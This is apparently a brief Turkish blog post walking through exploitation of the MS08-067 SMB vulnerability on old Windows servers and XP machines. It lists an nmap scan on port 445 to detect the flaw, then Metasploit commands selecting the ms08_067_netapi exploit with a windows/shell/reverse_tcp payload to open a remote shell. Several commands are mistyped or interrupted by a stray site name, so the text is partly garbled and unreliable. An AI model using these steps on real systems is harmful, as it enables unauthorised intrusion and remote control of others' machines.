Genelde 2000li windows Serverlarda ve xp makinalarda bulunur.
SMB üzerine yazılmış bir exploittir.
Bu zafiyeti tespit etmek için sistem üzerine bilindik bir nmap taraması yapabiliriz.
usr/share/nmap/scripts/ -ls | grap “ms08”karşımıza çıkan scripti kopyalıyoruz ve
nmap –scripts script adı ip adresi -p445 ile(www.sechunterz.pw)sistemde tarama yaptırıyoruz ve zafiyetin olduğunu gözlemliyoruz.
daha sonra msfconsole’dan
use exploit/windows/smb/ms08_067_netapi
set payload windows/shell/reverse_tcpGerekli tüm ayarlamaları yaptıktan sonra run diyerek exploiti başlatıyoruz.
0 comments:
Yorum Gönder